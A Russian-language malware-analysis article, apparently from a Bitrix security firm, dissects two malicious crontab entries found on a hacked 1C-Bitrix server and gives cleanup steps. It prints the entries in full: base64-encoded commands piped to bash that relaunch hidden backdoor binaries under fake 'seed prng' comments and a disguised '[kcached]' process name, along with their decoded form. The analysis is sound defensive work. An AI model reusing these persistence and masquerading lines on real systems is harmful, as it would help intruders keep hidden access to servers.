Вирусы в CRON Битрикс

Пример, первые две записи в вашем cron — это с очень высокой вероятностью запуск вредоносного ПО (вируса, майнера, бэкдора и т.д.).

Давайте разберем их:

Первая вредоносная запись:

**

# DO NOT REMOVE THIS LINE. SEED PRNG. #gs-dbus-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVU2MDAgZ3MtZGJ1cyAyPi9kZXYvbnVsbCB8fCBTSEVMTD0vYmluL2Jhc2ggVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPSItayAvaG9tZS9iaXRyaXgvLmNvbmZpZy9kYnVzL2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9iaXRyaXgvLmNvbmZpZy9kYnVzL2dzLWRidXMnIiAyPi9kZXYvbnVsbAo=|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel

• echo L3V...Ao= | base64 -d | bash: Это классический приём для сокрытия вредоносного кода. Длинная строка в base64 декодируется и результат передаётся на выполнение bash.

• 2>/dev/null: Подавление вывода ошибок, чтобы скрыть активность.

• Комментарии # DO NOT REMOVE THIS LINE. SEED PRNG. #gs-dbus-kernel и #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel: Попытка замаскироваться под что-то системное или безобидное. gs-dbus или dbus — это легитимные компоненты системы, но здесь их имена используются для маскировки.

Давайте декодируем команду:

echo "L3Vzci9iaW4vcGtpbGwgLTAgLVU2MDAgZ3MtZGJ1cyAyPi9kZXYvbnVsbCB8fCBTSEVMTD0vYmluL2Jhc2ggVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPSItayAvaG9tZS9iaXRyaXgvLmNvbmZpZy9kYnVzL2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9iaXRyaXgvLmNvbmZpZy9kYnVzL2dzLWRidXMnIiAyPi9kZXYvbnVsbAo=" | base64 -d

Результат декодирования:

/usr/bin/pkill -0 -U600 gs-dbus 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/bitrix/.config/dbus/gs-dbus.dat -liQD" /usr/bin/bash -c "exec -a '[kcached]' '/home/bitrix/.config/dbus/gs-dbus'" 2>/dev/null

Анализ:

• pkill -0 -U600 gs-dbus 2>/dev/null: Проверяет, запущен ли процесс с именем gs-dbus от пользователя с UID 600 (вероятно, это UID пользователя bitrix, нужно проверить командой id bitrix).

• ||: Если процесс не запущен (или команда pkill завершилась с ошибкой), то выполняется следующая часть.

• SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/bitrix/.config/dbus/gs-dbus.dat -liQD": Устанавливаются переменные окружения. GS_ARGS передает аргументы вредоносной программе, включая путь к конфигурационному/ключевому файлу /home/bitrix/.config/dbus/gs-dbus.dat.

• /usr/bin/bash -c "exec -a '[kcached]' '/home/bitrix/.config/dbus/gs-dbus'" 2>/dev/null: Запускает исполняемый файл /home/bitrix/.config/dbus/gs-dbus. Опция exec -a '[kcached]' — это трюк, чтобы замаскировать имя процесса. В выводе ps aux он будет отображаться как [kcached], пытаясь выглядеть как легитимный процесс ядра.

Вторая вредоносная запись:

# DO NOT REMOVE THIS LINE. SEED PRNG. #core-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVU2MDAgY29yZSAyPi9kZXYvbnVsbCB8fCAnL2hvbWUvYml0cml4Ly5jb25maWcvaHRvcC9jb3JlJyAyPi9kZXYvbnVsbAo=|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng core-kernel

Аналогичная структура. Декодируем:

echo "L3Vzci9iaW4vcGtpbGwgLTAgLVU2MDAgY29yZSAyPi9kZXYvbnVsbCB8fCAnL2hvbWUvYml0cml4Ly5jb25maWcvaHRvcC9jb3JlJyAyPi9kZXYvbnVsbAo=" | base64 -d

Результат декодирования:

/usr/bin/pkill -0 -U600 core 2>/dev/null || '/home/bitrix/.config/htop/core' 2>/dev/null

Анализ:

• pkill -0 -U600 core 2>/dev/null: Проверяет, запущен ли процесс с именем core от пользователя с UID 600.

• ||: Если нет, то…

• '/home/bitrix/.config/htop/core' 2>/dev/null: Запускает исполняемый файл /home/bitrix/.config/htop/core. Снова используется скрытая папка .config и имя htop (легитимная утилита мониторинга) для маскировки.

Третья запись (потенциально легитимная, но требует проверки в контексте взлома):

0 7 * * * /usr/bin/php -d short_open_tag=on -d memory_limit=512M -d error_reporting=22519 -f /home/bitrix/www/bitrix/modules/webdebug.antirutin/cli/execute.php profile=1 external=y99lkeec4woajvd6vtojse305t0ou64o >> /home/bitrix/www/upload/webdebug.antirutin/log/log_001.2naag4kiy7fldy5ia3z1eb92ktzg8kld.log 2>&1

Эта запись выглядит как стандартная задача для модуля Битрикс webdebug.antirutin. Однако, учитывая наличие двух вредоносных записей, стоит убедиться, что:

• Этот модуль действительно установлен вами и используется.

• Сам файл /home/bitrix/www/bitrix/modules/webdebug.antirutin/cli/execute.php не был модифицирован злоумышленниками.

Что делать НЕМЕДЛЕННО:

• Удалите первые две вредоносные строки из crontab.

• Войдите на сервер под пользователем bitrix (или тем пользователем, в чьем crontab это найдено).

• Выполните: crontab -e

• Удалите две строки, которые мы идентифицировали как вредоносные. Сохраните изменения.

• Если это было в системном crontab (/etc/crontab или файлы в /etc/cron.d/), отредактируйте их с правами root.

• Найдите и удалите вредоносные файлы:

• /home/bitrix/.config/dbus/gs-dbus

• /home/bitrix/.config/dbus/gs-dbus.dat

• /home/bitrix/.config/htop/core Будьте осторожны при удалении из скрытых папок, чтобы не удалить ничего лишнего, но эти файлы, судя по всему, являются частью вредоноса.

• Убейте запущенные вредоносные процессы:

• Используйте ps aux | grep -E "\[kcached]|gs-dbus|htop/core" или просто ps aux | grep bitrix и ищите процессы, запущенные из указанных выше путей или с подозрительными именами.

• Запомните PID (Process ID) и убейте их: sudo kill -9 **[PID_ПРОЦЕССА](/articles/bitriks-virtualnaya-mashina/kak-uznat-pid-protsessa/)**. Возможно, придется убивать их несколько раз, если они перезапускаются друг другом (до удаления записей из cron). PID_ПРОЦЕССА

• Проверьте систему на наличие других вредоносных активностей:

• Проверьте другие crontab (root, других пользователей).

• Проверьте /tmp, /var/tmp на наличие подозрительных исполняемых файлов.

• Просмотрите логи авторизации (/var/log/secure или /var/log/auth.log) на предмет несанкционированных входов.

• Проверьте сетевые соединения: ss -tulnp | grep LISTEN или netstat -tulnp | grep LISTEN. Ищите подозрительные слушающие порты.

• Найдите причину взлома:

• Слабые пароли (SSH, FTP, пароль пользователя bitrix, пароли к админке Битрикс).

• Уязвимости в Битрикс или его модулях (убедитесь, что все обновлено до последних версий).

• Уязвимости в ПО сервера (веб-сервер, PHP, ОС).

• Компрометация через другие сайты на том же сервере.

• Смените ВСЕ пароли после очистки системы.

• Обновите все ПО до последних версий (ОС, веб-сервер, PHP, Битрикс и его модули).

• Рассмотрите возможность установки антивируса для Linux (например, ClamAV) и сканера вредоносных программ (например,Maldet - Linux Malware Detect).

• Проверьте целостность файлов Битрикс, если есть такая возможность (например, сравнив с чистой установкой или бэкапом).

Это серьезный инцидент безопасности. Просто удалить вредоносные записи из cron недостаточно. Нужно провести полное расследование и устранить первопричину взлома, иначе система будет скомпрометирована снова. Если вы не уверены в своих силах, обратитесь к специалистам по кибербезопасности.

Беспокоитесь о безопасности вашего сайта или сервера? Мы проводим полный аудит безопасности, устраняем уязвимости, лечим вирусы на 1С-Битрикс и настраиваем надежную защиту. Свяжитесь с нами, чтобы защитить ваш бизнес.